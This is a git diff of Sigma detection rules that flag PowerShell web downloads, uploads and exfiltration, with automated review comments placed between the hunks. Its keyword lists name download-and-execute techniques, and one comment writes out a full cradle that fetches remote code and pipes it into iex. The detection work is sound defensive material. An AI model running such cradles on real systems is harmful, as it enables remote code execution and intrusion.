diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml b/deprecated/windows/proc_creation_win_powershell_download_cradles.yml
similarity index 95%
rename from rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml
rename to deprecated/windows/proc_creation_win_powershell_download_cradles.yml
index 88d62daf8..cde62279c 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml
+++ b/deprecated/windows/proc_creation_win_powershell_download_cradles.yml
@@ -1,12 +1,12 @@
 title: PowerShell Web Download
 id: 6e897651-f157-4d8f-aaeb-df8151488385
-status: test
+status: deprecated
 description: Detects suspicious ways to download files or content using PowerShell
 references:
 - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
 author: Florian Roth (Nextron Systems)
 date: 2022-03-24
-modified: 2023-01-05
+modified: 2025-07-18
 tags:
 - attack.command-and-control
 - attack.execution
diff --git a/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml b/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml
index db994e6be..0a44b8cdb 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml
@@ -8,7 +8,7 @@ references:
 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4
 author: frack113
 date: 2022-01-07
-modified: 2023-05-04
+modified: 2025-07-18
 tags:
 - attack.exfiltration
 - attack.t1020
@@ -19,12 +19,18 @@ logsource:
 detection:
 selection_cmdlet:
 ScriptBlockText|contains:
+ - 'Invoke-RestMethod'
 - 'Invoke-WebRequest'
+ - 'irm '
 - 'iwr '
 selection_flag:
 ScriptBlockText|contains:
- - '-Method Put'
- - '-Method Post'
+ - '-Method "POST"'
+ - '-Method "PUT"'
+ - '-Method POST'
+ - '-Method PUT'
+ - "-Method 'POST'"
+ - "-Method 'PUT'"
 condition: all of selection_*
 falsepositives:
 - Unknown
diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml
index 2bdf61bd4..a9d8f0b3f 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml
+++ b/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml
@@ -8,7 +8,7 @@ references:
 - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols
 author: frack113
 date: 2022-01-23
-modified: 2023-01-02
+modified: 2025-07-18
 tags:
 - attack.command-and-control
 - attack.t1071.001
@@ -17,11 +17,15 @@ logsource:
 category: ps_script
 definition: 'Requirements: Script Block Logging must be enabled'
 detection:
- selection:
- ScriptBlockText|contains|all:
+ selection_webrequest:
+ ScriptBlockText|contains:
 - 'Invoke-WebRequest'
- - '-UserAgent '
- condition: selection
+ - 'Invoke-RestMethod'
+ - ' irm ' # Space before and after to avoid false positives with 'irm' as a variable
+ - 'iwr '
+ selection_useragent:
+ ScriptBlockText|contains: '-UserAgent '
+ condition: all of selection_*
 falsepositives:
 - Unknown
 level: medium
diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml
index c978e4067..fc9a9ea77 100644
--- a/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml
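Review bot: The new `'irm '` entry in selection_cmdlet is padded differently from the same alias in the other rules this commit touches, and neither form is documented here: unpadded it also matches any script block containing `-Confirm ` or `$confirm `, while the padded `' irm '` used in posh_ps_susp_invoke_webrequest_useragent, posh_ps_web_request_cmd_and_cmdlets, proc_creation_win_powershell_invoke_webrequest_direct_ip and proc_creation_win_susp_web_request_cmd_and_cmdlets misses a script block whose text begins with `irm ` (a block launched through `-c` starts at the alias itself) and sits next to an unpadded `'iwr '` in the same list. The remaining hunks (download_dll, download_iex, data_exfiltration_via_cli, obfuscated_ip_download, registry_set_powershell_in_run_keys) use the unpadded form, so the rule set now encodes two opposite trade-offs for one alias. Pick one convention for all of them and state it in a comment on the entry, e.g. `- 'irm '  # unpadded on purpose: blocks started via -c begin with the alias, accepting the -Confirm overlap`. The `-Method` list also omits the `-Method:POST` / `-Method:PUT` parameter form PowerShell accepts; if the list is meant to be exhaustive add those two entries (the case variants are already covered, since contains matching is case-insensitive).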
+++ b/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml
@@ -10,7 +10,7 @@ references:
 - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell
 author: James Pemberton / @4A616D6573
 date: 2019-10-24
-modified: 2023-01-10
+modified: 2025-07-18
 tags:
 - attack.execution
 - attack.t1059.001
@@ -25,6 +25,7 @@ detection:
 - 'curl '
 - 'Invoke-RestMethod'
 - 'Invoke-WebRequest'
+ - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
 - 'iwr '
 - 'Net.WebClient'
 - 'Resume-BitsTransfer'
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml
index 116097947..fd5043e3a 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml
@@ -1,11 +1,12 @@
 title: Potential DLL File Download Via PowerShell Invoke-WebRequest
 id: 0f0450f3-8b47-441e-a31b-15a91dc243e2
 status: test
-description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
+description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets.
 references:
 - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
 author: Florian Roth (Nextron Systems), Hieu Tran
 date: 2023-03-13
+modified: 2025-07-18
 tags:
 - attack.command-and-control
 - attack.execution
@@ -17,7 +18,9 @@ logsource:
 detection:
 selection:
 CommandLine|contains:
+ - 'Invoke-RestMethod '
 - 'Invoke-WebRequest '
+ - 'IRM '
 - 'IWR '
 CommandLine|contains|all:
 - 'http'
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml
index 5fb9dc6cf..119a8e737 100644
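Review bot: In proc_creation_win_powershell_download_dll the title still reads `Potential DLL File Download Via PowerShell Invoke-WebRequest` while the new description and the selection in the second hunk now cover Invoke-RestMethod as well, so the rule name no longer says what it detects. Rename it in the same commit, e.g. `title: Potential DLL File Download Via PowerShell Invoke-WebRequest Or Invoke-RestMethod`, so dashboards and alert names pick up the widened scope. The `CommandLine|contains|all` block that completes the selection continues outside the hunk.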
--- a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml
@@ -7,7 +7,7 @@ references:
 - https://labs.withsecure.com/publications/fin7-target-veeam-servers
 author: Florian Roth (Nextron Systems)
 date: 2022-03-24
-modified: 2023-05-04
+modified: 2025-07-18
 tags:
 - attack.execution
 - attack.t1059
@@ -21,6 +21,8 @@ detection:
 - '.DownloadFile('
 - 'Invoke-WebRequest '
 - 'iwr '
+ - 'Invoke-RestMethod '
+ - 'irm ' #powershell -ep bypass -w h -c irm test.domain/ffe | iex
 selection_iex:
 CommandLine|contains:
 - ';iex $'
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
index 55ffdff93..58df5081d 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml
@@ -15,16 +15,20 @@ logsource:
 detection:
 selection_img:
 - Image|endswith:
+ - '\powershell_ise.exe'
 - '\powershell.exe'
 - '\pwsh.exe'
 - OriginalFileName:
+ - 'powershell_ise.EXE'
 - 'PowerShell.EXE'
 - 'pwsh.dll'
 selection_commands:
 CommandLine|contains:
 # These are all aliases of Invoke-WebRequest
 - 'curl '
+ - 'Invoke-RestMethod'
 - 'Invoke-WebRequest'
+ - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
 - 'iwr '
 - 'wget '
 selection_ip:
diff --git a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml
index 892f6d19f..386afab76 100644
--- a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml
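Review bot: The inline comment on the new `'irm '` line in proc_creation_win_powershell_download_iex has no space after `#` and only one space before it, unlike the `  # Space before and after …` comments added elsewhere in this commit; a yamllint `comments` check would flag it, and pasting a full sample command line into a rule comment adds little over stating what the entry is. I would write the line as `- 'irm '  # alias of Invoke-RestMethod; covers -c one-liners that pipe the download into iex` and keep the example out. The two entries are also appended after `'iwr '` rather than inserted in the alphabetical order the sibling lists keep (the direct_ip hunk below does it right); the same unsorted insertion is in proc_creation_win_susp_obfuscated_ip_download and registry_set_powershell_in_run_keys.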
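Review bot: The comment `# These are all aliases of Invoke-WebRequest` above selection_commands in proc_creation_win_powershell_invoke_webrequest_direct_ip is no longer true once `'Invoke-RestMethod'` and `' irm '` sit under it, since `irm` is the alias of Invoke-RestMethod, not of Invoke-WebRequest; reword it to `# Invoke-WebRequest / Invoke-RestMethod and their aliases`. Adding `\powershell_ise.exe` and `powershell_ise.EXE` to selection_img (here, in proc_creation_win_powershell_invoke_webrequest_download and in proc_creation_win_susp_data_exfiltration_via_cli) deserves a comment explaining the expected hit: as far as I know powershell_ise.exe only accepts -File, -NoProfile and -mta, so a cmdlet name on its command line would normally only be part of a script path, which is not what the selection_commands keywords are written for. The `'powershell_ise.EXE'` casing beside `'PowerShell.EXE'` is a minor style nit given case-insensitive matching. The selection_ip block that completes this detection lies outside the hunk.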
@@ -9,7 +9,7 @@ references:
 - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022-08-02
-modified: 2024-02-23
+modified: 2025-07-18
 tags:
 - attack.command-and-control
 - attack.t1105
@@ -19,9 +19,11 @@ logsource:
 detection:
 selection_img:
 - Image|endswith:
+ - '\powershell_ise.exe'
 - '\powershell.exe'
 - '\pwsh.exe'
 - OriginalFileName:
+ - 'powershell_ise.EXE'
 - 'PowerShell.EXE'
 - 'pwsh.dll'
 selection_commands:
diff --git a/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml b/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml
index e174a1b03..ab64735f0 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml
@@ -6,7 +6,7 @@ references:
 - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
 author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022-08-02
-modified: 2023-07-27
+modified: 2025-07-18
 tags:
 - attack.execution
 - attack.t1059.001
@@ -16,14 +16,17 @@ logsource:
 detection:
 selection_iwr:
 Image|endswith:
+ - '\powershell_ise.exe'
 - '\powershell.exe'
 - '\pwsh.exe'
 - '\cmd.exe'
 CommandLine|contains:
+ - 'curl '
+ - 'Invoke-RestMethod'
 - 'Invoke-WebRequest'
+ - 'irm '
 - 'iwr '
 - 'wget '
- - 'curl '
 CommandLine|contains|all:
 - ' -ur' # Shortest possible version of the -uri flag
 - ' -me' # Shortest possible version of the -method flag
diff --git a/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml b/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml
index 89b66f3ce..b2c055e31 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml
@@ -8,7 +8,7 @@ references:
 - https://twitter.com/fr0s7_/status/1712780207105404948
 author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
 date: 2022-08-03
-modified: 2023-11-06
+modified: 2025-07-18
 tags:
 - attack.discovery
 logsource:
@@ -19,6 +19,8 @@ detection:
 CommandLine|contains:
 - 'Invoke-WebRequest'
 - 'iwr '
+ - 'Invoke-RestMethod'
+ - 'irm '
 - 'wget '
 - 'curl '
 - 'DownloadFile'
diff --git a/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml b/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml
index 580a7accb..283020fdd 100644
--- a/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml
+++ b/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml
@@ -7,6 +7,8 @@ related:
 type: obsolete
 - id: cd5c8085-4070-4e22-908d-a5b3342deb74
 type: obsolete
+ - id: 6e897651-f157-4d8f-aaeb-df8151488385
+ type: obsolete
 status: test
 description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine
 references:
@@ -15,7 +17,7 @@ references:
 - https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps
 author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
 date: 2019-10-24
-modified: 2023-01-10
+modified: 2025-07-18
 tags:
 - attack.execution
 - attack.t1059.001
@@ -29,6 +31,7 @@ detection:
 - 'curl '
 - 'Invoke-RestMethod'
 - 'Invoke-WebRequest'
+ - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring
 - 'iwr '
 - 'Net.WebClient'
 - 'Resume-BitsTransfer'
diff --git a/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml b/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml
index 05ee02fd2..7b7684472 100644
--- a/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml
+++ b/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml
@@ -1,4 +1,4 @@
-title: Suspicious Powershell In Registry Run Keys
+title: Suspicious PowerShell In Registry Run Keys
 id: 8d85cf08-bf97-4260-ba49-986a2a65129c
 status: test
 description: Detects potential PowerShell commands or code within registry run keys
@@ -8,7 +8,7 @@ references:
 - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md
 author: frack113, Florian Roth (Nextron Systems)
 date: 2022-03-17
-modified: 2025-02-17
+modified: 2025-07-18
 tags:
 - attack.persistence
 - attack.t1547.001
@@ -40,6 +40,8 @@ detection:
 - 'ICM -'
 - 'Invoke-WebRequest'
 - 'IWR '
+ - 'Invoke-RestMethod'
+ - 'IRM '
 - ' -noni '
 - ' -noninteractive '
 condition: selection